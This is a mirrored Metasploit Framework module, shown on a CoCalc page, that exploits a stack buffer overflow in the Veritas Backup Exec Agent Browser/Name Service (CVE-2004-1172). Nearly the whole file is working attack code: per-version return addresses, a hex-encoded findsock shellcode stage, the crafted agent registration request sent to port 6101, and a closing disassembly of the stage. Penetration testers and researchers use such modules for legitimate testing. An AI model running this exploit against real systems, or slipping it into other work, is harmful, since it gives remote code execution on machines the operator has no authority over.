CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/backupexec/name_service.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Veritas Backup Exec Name Service Overflow',

14
      'Description'    => %q{

15
          This module exploits a vulnerability in the Veritas Backup

16
        Exec Agent Browser service. This vulnerability occurs when a

17
        recv() call has a length value too long for the	destination

18
        stack buffer. By sending an agent name value of 63 bytes or

19
        more, we can overwrite the return address of the recv

20
        function. Since we only have ~60 bytes of contiguous space

21
        for shellcode, a tiny findsock payload is sent which uses a

22
        hardcoded IAT address for the recv() function. This payload

23
        will then roll the stack back to the beginning of the page,

24
        recv() the real shellcode into it, and jump to it. This

25
        module has been tested against Veritas 9.1 SP0, 9.1 SP1, and

26
        8.6.

27
      },

28
      'Author'         => [ 'hdm' ],

29
      'License'        => MSF_LICENSE,

30
      'References'     =>

31
        [

32
          [ 'CVE', '2004-1172'],

33
          [ 'OSVDB', '12418'],

34
          [ 'BID', '11974'],

35
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],

36
        ],

37
      'Privileged'     => true,

38
      'Payload'        =>

39
        {

40
          'Space'    => 1024,

41
          'MinNops'  => 512,

42
          'StackAdjustment' => -3500,

43
        },

44
      'Platform'       => %w{ win },

45
      'Targets'        =>

46
        [

47
          [

48
            'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101

49
            {

50
              'Platform' => 'win',

51
              'Rets'     => [ 0x0142ffa1, 0x401150FF ], # [email protected] v9.1.4691.0 | [email protected]

52
            },

53
          ],

54
          [

55
            'Veritas BE 8.5',

56
            {

57
              'Platform' => 'win',

58
              'Rets'     => [ 0x014308b9, 0x401138FF ], # [email protected] v8.50.3572 | [email protected] v8.50.3572

59
            },

60
          ],

61
        ],

62
      'DisclosureDate' => '2004-12-16',

63
      'DefaultTarget' => 0))

64


65
    register_options(

66
      [

67
        Opt::RPORT(6101)

68
      ])

69
  end

70


71
  def exploit

72
    connect

73


74
    print_status("Trying target #{target.name}...")

75


76
    # This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)

77
    # The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid

78
    # nulls: [0x00401150 -> 0x401150FF]

79
    stage_code = "\xfc" * 112

80
    stage_read =

81
      "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74"+

82
      "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11"+

83
      "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"

84


85
    # Configure the IAT for the recv call

86
    stage_read[29, 4] = [ target['Rets'][1] ].pack('V')

87


88
    # Stuff it all into one request

89
    stage_code[2, stage_read.length] = stage_read

90


91
    # Create the registration request

92
    req =

93
      "\x02\x00\x32\x00\x20\x00" + stage_code + "\x00"+

94
      "1.1.1.1.1.1\x00" + "\xeb\x81"

95


96
    print_status("Sending the agent registration request of #{req.length} bytes...")

97
    sock.put(req)

98


99
    print_status("Sending the payload stage down the socket...")

100
    sock.put(payload.encoded)

101


102
    print_status("Waiting for the payload to execute...")

103
    select(nil,nil,nil,2)

104


105
    handler

106
    disconnect

107
  end

108
end

109


110


111
__END__

112
[ findsock stage ]

113
00000000  31F6              xor esi,esi

114
00000002  C1EC0C            shr esp,0xc

115
00000005  C1E40C            shl esp,0xc

116
00000008  89E7              mov edi,esp

117
0000000A  89FB              mov ebx,edi

118
0000000C  6A01              push byte +0x1

119
0000000E  8B7424FE          mov esi,[esp-0x2]

120
00000012  31D2              xor edx,edx

121
00000014  52                push edx

122
00000015  42                inc edx

123
00000016  C1E210            shl edx,0x10

124
00000019  52                push edx

125
0000001A  57                push edi

126
0000001B  56                push esi

127
0000001C  B8FF501140        mov eax,0x401150ff

128
00000021  C1E808            shr eax,0x8

129
00000024  FF10              call near [eax]

130
00000026  85C0              test eax,eax

131
00000028  7907              jns 0x31

132
0000002A  89DC              mov esp,ebx

133
0000002C  4E                dec esi

134
0000002D  85F6              test esi,esi

135
0000002F  75E1              jnz 0x12

136
00000031  FFD7              call edi

137


138